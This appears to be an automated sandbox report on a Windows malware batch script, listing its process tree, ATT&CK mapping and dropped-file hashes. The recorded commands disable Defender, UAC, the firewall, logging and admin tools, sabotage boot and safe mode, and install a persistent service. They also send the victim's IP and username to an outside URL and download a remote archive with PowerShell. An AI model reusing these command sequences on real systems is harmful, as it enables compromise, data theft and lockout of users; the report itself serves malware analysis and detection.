C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "EnableScriptBlockLogging" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Undefined" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ScriptBlockLogging" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f2⤵
- Disables RegEdit via registry modification
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig | findstr IPv42⤵
-
C:\Windows\system32\ipconfig.exeipconfig3⤵
- Gathers network information
-
C:\Windows\system32\findstr.exefindstr IPv43⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.perfect.wuaze.com/guardar_ip.php?id=10.127.1.232⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffd31f46f8,0x7fffd31f4708,0x7fffd31f47183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2036 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5204 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5204 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3740 /prefetch:13⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c whoami2⤵
-
C:\Windows\system32\whoami.exewhoami3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=admin2⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffd31f46f8,0x7fffd31f4708,0x7fffd31f47183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=fzbxdxua\admin2⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffd31f46f8,0x7fffd31f4708,0x7fffd31f47183⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user "Admin"2⤵
-
C:\Windows\system32\net.exenet user "Admin"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user "Admin"4⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\notepad.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\manage-bde.exemanage-bde -off C:2⤵
-
C:\Windows\system32\manage-bde.exemanage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"2⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled yes2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\sc.exesc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"2⤵
- Launches sc.exe
-
C:\Windows\system32\net.exenet start MiServicio2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start MiServicio3⤵
-
C:\Windows\system32\takeown.exetakeown /F "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault" 2>nul | find "BackupProductKeyDefault"2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault"3⤵
-
C:\Windows\system32\find.exefind "BackupProductKeyDefault"3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.perfect.wuaze.com/guardar_ip.php?id=2⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffd31f46f8,0x7fffd31f4708,0x7fffd31f47183⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://bonzi.link/Bon.zip', 'Bon.zip')"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Expand-Archive -Path 'Bon.zip' -DestinationPath '.'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /F /IM msedge.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /F /IM firefox.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\timeout.exetimeout /t 300 /nobreak2⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\malware.bat1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\net.exenet session2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=33892⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv42⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes2⤵
- Modifies Windows Firewall
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exeREG IMPORT "C:\Windows\TEMP\disable_winload.reg"2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- UAC bypass
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "EnableScriptBlockLogging" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Undefined" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ScriptBlockLogging" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig | findstr IPv42⤵
-
C:\Windows\system32\ipconfig.exeipconfig3⤵
- Gathers network information
-
C:\Windows\system32\findstr.exefindstr IPv43⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c whoami2⤵
-
C:\Windows\system32\whoami.exewhoami3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user "FZBXDXUA$"2⤵
-
C:\Windows\system32\net.exenet user "FZBXDXUA$"3⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\notepad.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\manage-bde.exemanage-bde -off C:2⤵
-
C:\Windows\system32\manage-bde.exemanage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"2⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled yes2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\sc.exesc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"2⤵
- Launches sc.exe
-
C:\Windows\system32\net.exenet start MiServicio2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start MiServicio3⤵
-
C:\Windows\system32\takeown.exetakeown /F "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
System Services
1Service Execution
1Command and Scripting Interpreter
2PowerShell
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
2Windows Service
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD54f7152bc5a1a715ef481e37d1c791959
SHA1c8a1ed674c62ae4f45519f90a8cc5a81eff3a6d7
SHA256704dd4f98d8ca34ec421f23ba1891b178c23c14b3301e4655efc5c02d356c2bc
SHA5122e6b02ca35d76a655a17a5f3e9dbd8d7517c7dae24f0095c7350eb9e7bdf9e1256a7009aa8878f96c89d1ea4fe5323a41f72b8c551806dda62880d7ff231ff5c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5ea98e583ad99df195d29aa066204ab56
SHA1f89398664af0179641aa0138b337097b617cb2db
SHA256a7abb51435909fa2d75c6f2ff5c69a93d4a0ab276ed579e7d8733b2a63ffbee6
SHA512e109be3466e653e5d310b3e402e1626298b09205d223722a82344dd78504f3c33e1e24e8402a02f38cd2c9c50d96a303ce4846bea5a583423937ab018cd5782f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
96B
MD57c0df6294b55b6b8080f767d7f5767f7
